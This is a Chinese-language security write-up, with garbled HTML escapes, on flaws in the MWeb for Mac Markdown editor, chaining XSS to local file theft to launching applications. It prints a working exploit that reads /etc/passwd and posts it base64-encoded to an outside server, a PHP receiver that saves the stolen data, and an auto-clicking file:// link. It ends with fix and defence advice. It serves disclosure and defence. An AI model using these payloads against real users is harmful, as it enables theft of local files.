MWeb For Mac 客户端安全漏洞分析：从XSS到文件窃取再到伪RCE<\/h1>

漏洞概述<\/h2>

MWeb For Mac 客户端存在一系列安全漏洞，攻击链如下：<\/p>

跨站脚本(XSS)漏洞<\/li>
利用XSS实现任意文件读取<\/li>

进一步实现伪远程代码执行(RCE)<\/li> <\/ol>

漏洞分析<\/h2>

1. XSS漏洞<\/h3>

漏洞原理<\/strong>：<\/p>

MWeb使用了KHTML引擎渲染HTML内容<\/li>
该引擎未对JavaScript执行做充分限制<\/li>
攻击者可以通过插入恶意脚本标签实现XSS<\/li> <\/ul>
POC<\/strong>：<\/p>
<script<\/span> src<\/span>=<\/span>"\/\/XssStage\/ip.js"<\/span>><\/script<\/span>> <\/span><\/span><\/code><\/pre>特点<\/strong>：<\/p> 常规的alert()<\/code>可能被限制，但其他JS功能仍可执行<\/li> 所有HTML标签均可执行<\/li> <\/ul> 2. 文件窃取漏洞<\/h3> 利用方式<\/strong>：通过XSS执行JavaScript读取本地文件并外传<\/p> 完整利用代码<\/strong>：<\/p> <<\/span>script<\/span>><\/span> <\/span><\/span>\/\/ 包含BASE64编码函数库 <\/span><\/span><\/span><\/span>(function<\/span>() { <\/span><\/span> var<\/span> BASE64_MAPPING<\/span> =<\/span> ['A'<\/span>, 'B'<\/span>, 'C'<\/span>, 'D'<\/span>, 'E'<\/span>, 'F'<\/span>, 'G'<\/span>, 'H'<\/span>, 'I'<\/span>, 'J'<\/span>, 'K'<\/span>, 'L'<\/span>, 'M'<\/span>, 'N'<\/span>, 'O'<\/span>, 'P'<\/span>, 'Q'<\/span>, 'R'<\/span>, 'S'<\/span>, 'T'<\/span>, 'U'<\/span>, 'V'<\/span>, 'W'<\/span>, 'X'<\/span>, 'Y'<\/span>, 'Z'<\/span>, 'a'<\/span>, 'b'<\/span>, 'c'<\/span>, 'd'<\/span>, 'e'<\/span>, 'f'<\/span>, 'g'<\/span>, 'h'<\/span>, 'i'<\/span>, 'j'<\/span>, 'k'<\/span>, 'l'<\/span>, 'm'<\/span>, 'n'<\/span>, 'o'<\/span>, 'p'<\/span>, 'q'<\/span>, 'r'<\/span>, 's'<\/span>, 't'<\/span>, 'u'<\/span>, 'v'<\/span>, 'w'<\/span>, 'x'<\/span>, 'y'<\/span>, 'z'<\/span>, '0'<\/span>, '1'<\/span>, '2'<\/span>, '3'<\/span>, '4'<\/span>, '5'<\/span>, '6'<\/span>, '7'<\/span>, '8'<\/span>, '9'<\/span>, '+'<\/span>, '\/'<\/span>]; <\/span><\/span> \/\/ 省略BASE64编码相关函数... <\/span><\/span><\/span><\/span> window.BASE64<\/span> =<\/span> __BASE64<\/span>; <\/span><\/span>})(); <\/span><\/span> <\/span><\/span>\/\/ 创建XMLHttpRequest对象 <\/span><\/span><\/span><\/span>function<\/span> createXHR<\/span>() { <\/span><\/span> if<\/span> (typeof<\/span> XMLHttpRequest<\/span> !=<\/span> 'undefined'<\/span>) { <\/span><\/span> return<\/span> new<\/span> XMLHttpRequest<\/span>(); <\/span><\/span> } else<\/span> if<\/span> (typeof<\/span> ActiveXObject<\/span> !=<\/span> 'undefined'<\/span>) { <\/span><\/span> \/\/ 省略兼容IE的代码... <\/span><\/span><\/span><\/span> } else<\/span> { <\/span><\/span> throw<\/span> new<\/span> Error('No XHR Object available'<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 发送POST请求函数 <\/span><\/span><\/span><\/span>function<\/span> post<\/span>(URL<\/span>, PARAMS<\/span>) { <\/span><\/span> var<\/span> temp<\/span> =<\/span> document.createElement<\/span>("form"<\/span>); <\/span><\/span> temp<\/span>.action<\/span> =<\/span> URL<\/span>; <\/span><\/span> temp<\/span>.method<\/span> =<\/span> "post"<\/span>; <\/span><\/span> temp<\/span>.style<\/span>.display<\/span> =<\/span> "none"<\/span>; <\/span><\/span> for<\/span> (var<\/span> x<\/span> in<\/span> PARAMS<\/span>) { <\/span><\/span> var<\/span> opt<\/span> =<\/span> document.createElement<\/span>("textarea"<\/span>); <\/span><\/span> opt<\/span>.name<\/span> =<\/span> x<\/span>; <\/span><\/span> opt<\/span>.value<\/span> =<\/span> PARAMS<\/span>[x<\/span>]; <\/span><\/span> temp<\/span>.appendChild<\/span>(opt<\/span>); <\/span><\/span> } <\/span><\/span> document.body<\/span>.appendChild<\/span>(temp<\/span>); <\/span><\/span> temp<\/span>.submit<\/span>(); <\/span><\/span> return<\/span> temp<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 发送GET请求函数 <\/span><\/span><\/span><\/span>function<\/span> sendGetRequest<\/span>(url<\/span>, callback<\/span>) { <\/span><\/span> var<\/span> xhr<\/span> =<\/span> createXHR<\/span>(); <\/span><\/span> xhr<\/span>.open<\/span>('GET'<\/span>, url<\/span>, false<\/span>); <\/span><\/span> xhr<\/span>.send<\/span>(); <\/span><\/span> callback<\/span>(xhr<\/span>.responseText<\/span>); <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 读取\/etc\/passwd文件并发送到攻击者服务器 <\/span><\/span><\/span><\/span>sendGetRequest<\/span>('file:\/\/\/etc\/passwd'<\/span>, function<\/span>(response<\/span>) { <\/span><\/span> var<\/span> text<\/span> =<\/span> BASE64<\/span>.encoder<\/span>(response<\/span>); <\/span><\/span> post<\/span>('https:\/\/www.test.com\/mweb\/file.php'<\/span>, {file<\/span>:<\/span>text<\/span>}); <\/span><\/span>}); <\/span><\/span><<\/span>\/script><\/span> <\/span><\/span><\/code><\/pre>接收端PHP代码<\/strong>：<\/p> <?<\/span>php<\/span> <\/span><\/span> $data =<\/span> base64_decode<\/span>($_POST["file"<\/span>]); <\/span><\/span> $file =<\/span> fopen<\/span>("file.txt"<\/span>,'a'<\/span>); <\/span><\/span> fwrite<\/span>($file,$data); <\/span><\/span> fclose<\/span>($file); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>3. 伪RCE实现<\/h3> 利用原理<\/strong>：通过file协议直接调用本地应用程序<\/p> POC代码<\/strong>：<\/p> <a<\/span> href<\/span>=<\/span>"file:\/\/\/Applications\/Calculator.app"<\/span> onclick<\/span>=<\/span>"closewin();"<\/span> id<\/span>=<\/span>"alink"<\/span>> <\/span><\/span><input<\/span> id<\/span>=<\/span>"btn"<\/span> onclick<\/span>=<\/span>"test()"<\/span>> <\/input<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span> document.getElementById<\/span>("alink"<\/span>).click<\/span>(); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/code><\/pre>效果<\/strong>：<\/p> 可启动计算器等本地应用<\/li> 在Windows平台可结合js执行cmd实现更彻底的RCE<\/li> <\/ul> 漏洞修复建议<\/h2> 禁用所有JS脚本执行<\/strong>：<\/p> 这是最直接的解决方案<\/li> 对于Markdown编辑器，JS功能通常不是必须的<\/li> <\/ul> <\/li> 实现安全的HTML标签过滤<\/strong>：<\/p> 仅允许有限的HTML标签<\/li> 彻底过滤script等危险标签和属性<\/li> <\/ul> <\/li> 内容安全策略(CSP)<\/strong>：<\/p> 实施严格的内容安全策略<\/li> 限制外部资源加载<\/li> <\/ul> <\/li> 输入输出编码<\/strong>：<\/p> 对所有用户输入进行适当的编码<\/li> 输出时进行HTML实体编码<\/li> <\/ul> <\/li> <\/ol> 漏洞影响<\/h2> 信息泄露<\/strong>：<\/p> 可读取系统任意文件<\/li> 包括敏感配置文件、密码文件等<\/li> <\/ul> <\/li> 系统安全威胁<\/strong>：<\/p> 可执行本地应用程序<\/li> 在特定条件下可能实现完全RCE<\/li> <\/ul> <\/li> 持久性攻击<\/strong>：<\/p> 攻击代码可保存在文档中<\/li> 每次打开文档都会执行<\/li> <\/ul> <\/li> <\/ol> 技术总结<\/h2> 漏洞根源<\/strong>：<\/p> 过度信任用户输入<\/li> 未对Markdown中的HTML\/JS内容进行充分过滤<\/li> 使用了存在安全隐患的KHTML引擎<\/li> <\/ul> <\/li> 攻击链演进<\/strong>： XSS → 文件读取 → 伪RCE<\/p> <\/li> 同类风险<\/strong>：<\/p> 其他使用类似渲染引擎的Markdown编辑器可能也存在相同问题<\/li> Windows平台的编辑器风险更高，可能实现完整RCE<\/li> <\/ul> <\/li> <\/ol> 防御措施开发建议<\/h2> 白名单机制<\/strong>：<\/p> 仅允许安全的HTML标签和属性<\/li> 彻底禁止JavaScript执行<\/li> <\/ul> <\/li> 沙箱环境<\/strong>：<\/p> 在沙箱中渲染不受信任的内容<\/li> 限制文件系统访问<\/li> <\/ul> <\/li> 用户提示<\/strong>：<\/p> 对包含HTML\/JS的内容进行安全警告<\/li> 提供"安全模式"选项<\/li> <\/ul> <\/li> 持续更新<\/strong>：<\/p> 及时更新使用的渲染引擎<\/li> 跟踪相关安全公告<\/li> <\/ul> <\/li> <\/ol> 附录：完整POC文件<\/h2> 所有利用代码已打包在附件"MWeb For Mac 客户端 XSS 到任意文件窃取.zip"中，仅供安全研究使用。<\/p>